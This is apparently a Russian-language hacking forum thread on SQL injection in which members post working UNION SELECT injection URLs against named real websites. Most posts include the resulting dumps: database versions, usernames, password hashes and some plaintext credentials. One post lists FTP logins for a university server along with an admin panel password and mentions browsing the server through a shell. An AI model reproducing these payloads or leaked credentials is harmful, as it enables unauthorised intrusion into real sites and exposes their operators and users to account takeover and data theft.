SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Гаральд

    Гаральд New Member

    Joined:
    28 Jun 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    http://www.safin.com/index.php?c=england&t=3'&cat=3'&subcat=16'
     
  2. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    http://www.autoexotica.ru/news/?nid=130+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,1/*
    Там стоит IPB
    PS: Поробуй почитай фак по скулям и раскрути
     
    4 people like this.
  3. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    http://medcenter.kz/?mid=-1+union+select+1,concat(name,char(13),pass),3,4,5,6,7,8,9+from+users+limit+1,1--

    login: mcadmin
    pass: ordamed.kz
     
    2 people like this.
  4. Fugitif

    Fugitif Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    407
    Likes Received:
    227
    Reputations:
    42
    Code:
    http://www.espacejavascript.com/script.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4/*

     
  5. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Вот такой вот БОЛТ ))
    Version: 5.0.18-nt
    Dbname: iqc
    Username: [email protected]

    ничего про юзеров((

    ==============================
    PR-4
    фест какой то..виндовый хостинг.

    Username:nakusp@localhost
    Database:nakusp
    Version:5.0.45-community-nt
     
    #6305 $n@ke, 17 Aug 2008
    Last edited: 17 Aug 2008
  6. serfertty

    serfertty Guest

    Reputations:
    0
    Довел инъекцию Fugitif.
    Code:
     http://www.espacejavascript.com/script.php?id=-1' 
    http://www.espacejavascript.com/script.php?id=-1+union+select+1,2,3,version(),5,6,/*
    http://www.espacejavascript.com/script.php?id=-1+union+select+1,2,3,table_name,5,6
    +from+infomation_schema.tables/*
    
    Выводятся все таблицы,я выбрал site_admins_annu. Колнки: login,pass.
    login: G1Script
    pass:931af583573227f0220bc568c65ce104
     
    2 people like this.
  7. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    http://www.eutrainingsite.com/open_details.php?id=-1+union+select+1,email,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+users/*
    ничего полезного кроме мыл не нашел
     
    1 person likes this.
  8. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    ALL4HOSTING


    http://www.all4hosting.ru/

    таблы

    Более менее интересной показалась idClient

    Но там всего два юзера, и то западло какоето:
    +
    system_user:allforhosting
    @@version:Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
    db_name():allforhosting
     
    #6308 Dimi4, 17 Aug 2008
    Last edited: 24 Aug 2008
    2 people like this.
  9. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    http://www.davisvisitor.com/sub_hotels.php?id=9&city=-1+union+select+1,version(),3,4,5,6,7,8/*

    version 4.0.16
     
  10. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    http://www.michaelpollan.com/article.php?id=-87+union+select+1,version(),database(),4,5,6,user(),8,9,0/*
    version: MYSQL 4.1.22-standard
    database: pollan_articles
    user: pollan_article@localhost
     
    3 people like this.
  11. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Sql Inj

    Palit.biz
    Combined.biz
    Plusline.org
    Talk.biz
    Cyberthing.net
    Interprice.biz
    Ransomes-jacobsen.biz
    Talant.biz
    3 ver. by vital & jokester
     
    #6311 sabe, 17 Aug 2008
    Last edited: 17 Aug 2008
    1 person likes this.
  12. mister

    mister Elder - Старейшина

    Joined:
    24 Jul 2007
    Messages:
    30
    Likes Received:
    16
    Reputations:
    4
    Code:
    http://news.udaff.com
    POST-инъект
    Code:
    http://news.udaff.com/index.php
    cat=korresp&korrname='+union+select+1,concat_ws(0x3a,login,password),3+from+USERS+limit+0,1/*
    
    inzzz:6af0088fc7c444ab185664fc4625b44a:bugaga
     
    1 person likes this.
  13. ЛифчиС5СВ

    ЛифчиС5СВ Elder - Старейшина

    Joined:
    9 Mar 2007
    Messages:
    164
    Likes Received:
    141
    Reputations:
    12
    Немного о вине =)

    Code:
    http://www.dionysos-mereni.com/news.php?id=220+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8+from+admintable/*
    Табличку не подобрал =)
     
  14. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Премного извинюсь, ибо в бояне есть http://odmu.edu.ua
    Если господа модераторы сочтут, что данный пост есть зло - честно обзусь моментально удалить.

    Дело в том, что по поиску не нашел описания хека данного ресурса. Вдобавок есть куча смежных поддоменов к данному сайту. В общем раскрутил - если что - удалю...

    http://odmu.edu.ua/index.php?v=-1+union+select+1,2,concat(username,0x3a3a,password),4,5,6+from+proftpd.users+limit+0,100/* Выборка по ftp юзерам

    osas:::Z5ESqlRtTrt7Y
    anatomka:::pgwl.XrN4bs1o
    phosas:::KGt4CWj1zvBWc
    osasod:::JO96GZfMHu0BU
    adminweb:::MEDINedu
    sopott:::M.NEksFkXBxfk
    admfoto::WJc7OVOTQRkFs
    userfoto::RsRvTv93
    biophys:::gjtqJLxY0FDrM

    ftp://217.146.249.35 <-тыкаем сюда
    --------------------------------

    пример: login: biophys pass: gjtqJLxY0FDrM
    http://www.biophys.odmu.od.ua/


    login: adminweb pass: MEDINedu
    ftp://www.odmu.edu.ua/

    http://www.odmu.edu.ua/_.php <-админка
    Пароль: k.,bvfz ie,rf

    С помощью шела путешествуем по серверу на котором висит все это чудо.
     
    4 people like this.
  15. Glazz

    Glazz Elder - Старейшина

    Joined:
    9 Aug 2008
    Messages:
    116
    Likes Received:
    7
    Reputations:
    0
    Сайт группы Лялис Трубецкий
    http://www.lyapis.com/anons.php?id=-1+union+select+1,2,3,4,5/*
     
  16. Fugitif

    Fugitif Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    407
    Likes Received:
    227
    Reputations:
    42
    Code:
    http://www.lyapis.com/anons.php?id=5+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*
     
  17. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Code:
    http://fiske.colorado.edu/staff/index.php?id=-2+union+select+1,2,3,concat(table_schema,char(58),table_NAME),5,6,7,8+from+INFORMATION_SCHEMA.tables+limit+17,1/*
     
    1 person likes this.
  18. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Академия Наса.. )))

    http://www.nasa-academy.org/db/yearbookview.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(0x3a3a,'<b>',middlename,0x3a3a,login,0x3a3a,password,0x3a3a,password_expire,'</b>'),10,11,12,13+from+academy.alumni+limit+31,60/*

    Выборка по юзерам.

    http://www.nasa-academy.org/db/login.php аутентификация

    Шняга: х*** пойми как захеширован пароль. ибо некоторые побдираются, но система не логинится. МБ дабл хеш?


    К тому же походу file_priv разрешены, но пути х** нарыл...
     
    2 people like this.
  19. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    www.mirtravel.com
    Code:
    http://www.mirtravel.com/searcht.php?kstr=109&sent=1&ktyp=-1+UNION+SELECT+1,concat(table_name,0x3a,column_name)+FROM+information_schema.columns/*
    Code:
    http://www.mirtravel.com/searcht.php?kstr=109&sent=1&ktyp=-1+UNION+SELECT+1,concat(nusr,0x3a,pusr)+FROM+usr/*
    mir:4b53ed9250ece8ed
    admin:e1eba9bbbb04da14e0f0b1cec9eea708:zzz123
    Это логин под форум по ходу, а админка без пароля штоле http://www.mirtravel.com/admin/ :confused:
     
    #6319 Ponchik, 18 Aug 2008
    Last edited: 18 Aug 2008
    2 people like this.
  20. luz3r

    luz3r Banned

    Joined:
    23 Feb 2008
    Messages:
    119
    Likes Received:
    250
    Reputations:
    -11
    Что значит похоже на ордер бай? order by ето оператор он не пожет быть похож или нет... он в вводить при правильном значении..... а так если подставить кавычку там скули нет... там про100 ошибка обращения.
     
    1 person likes this.
Thread Status:
Not open for further replies.